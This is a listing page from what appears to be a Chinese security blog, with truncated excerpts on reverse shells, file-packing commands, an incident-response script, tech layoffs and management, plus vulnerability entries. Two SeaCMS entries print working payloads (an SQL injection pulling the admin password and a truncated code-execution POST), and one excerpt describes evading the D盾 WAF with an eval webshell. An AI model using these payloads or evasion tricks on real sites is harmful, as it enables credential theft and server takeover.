反弹Shell大全与原理
什么是反弹shell reverse shell(反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念...
Linux/Windows文件一键打包,批量打包
- 2019-04-24
- 周边
Linux文件一键打包命令 使用系统命令,查找相关后缀的全部文件并打包。 attention:without “&& echo ok”,the final tar -T xlsx.list -czf xlsx.tar.gz will fail -----------------打包所有的...
什么是增长黑客 Growth Hacker
增长黑客试图用更巧妙的方式解答产品得以增长的奥秘,建立帮助产品增长的长效机制。他们常用的手段包括A/B测试、搜索引擎优化、电子邮件召回、病毒营销等,在此基础上,他们依赖直接营销,量化指标,场景建模,...
LinuxCheck – Linux信息收集脚本
- 2019-04-23
- 安全工具
LinuxCheck介绍 LinuxCheck是一个linux信息搜集小脚本,主要用于应急响应,在Debian或Centos下都可使用,功能: 信息搜集(端口、网络、用户信息、登陆信息,iptables、各种环境变量或配置文件等)异常检...
被干掉的 “互联网老干部”
- 2019-04-21
- 网络安全
体面光鲜,年薪百万的互联网巨头中层管理者们正迎来一场关于“饭碗”的凛冬。 互联网又开始裁员了? 一直在优化。默默地。 裁掉那些人或部门之后,对互联网企业有啥影响? 没啥影响。 一边是裁员,清理...
海洋CMS V8.7 SQL注入漏洞
- 2019-04-18
- Vulndb
海洋CMS V8.7漏洞 payload /upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27` ...
海洋CMS V6.45 – V6.55前台Getshell 代码执行漏洞
- 2019-04-18
- Vulndb
海洋CMS v6.54漏洞 漏洞代码执行 Payload get: http://seacms.test/search.php POST: searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:let...
![[译] 我是如何完成从码农到管理层的过渡的](https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2019/04/12.png&h=320=&w=380&zc=1)
[译] 我是如何完成从码农到管理层的过渡的
- 2019-04-17
- 网络安全
我从来就没想过有一天我会当上经理。 在畅想未来的时候,我会想当一名码农,直到我挣够了钱就考虑转行。我甚至考虑过完全不相关的事,比如开一家餐馆(当我开始按照 J. Kenji López-Alt 的食谱进行烹...
中国蚁剑antSword RCE漏洞第二波,赶紧升升升
- 2019-04-17
- Vulndb
四天前爆出了第一个中国蚁剑RCE漏洞,今天再被挖出一个,github已经修复,各位git pull跟上。 漏洞分析 首先对蚁剑进行复测,发现分类目录处的XSS并没有被修复,可能因为过于鸡肋项目方忽略了。(不过需要...
过D盾Shell新思路分析
在先知上看到了一个shell过D盾的思路,同样可用来过其它waf。 D盾扫描结果 以前的思路常规,就是定义一个变量b:$b='';为空,$b = null;,$b = "\n";然后变量a: $a = $_GET['1'];,eval($a.$b);...
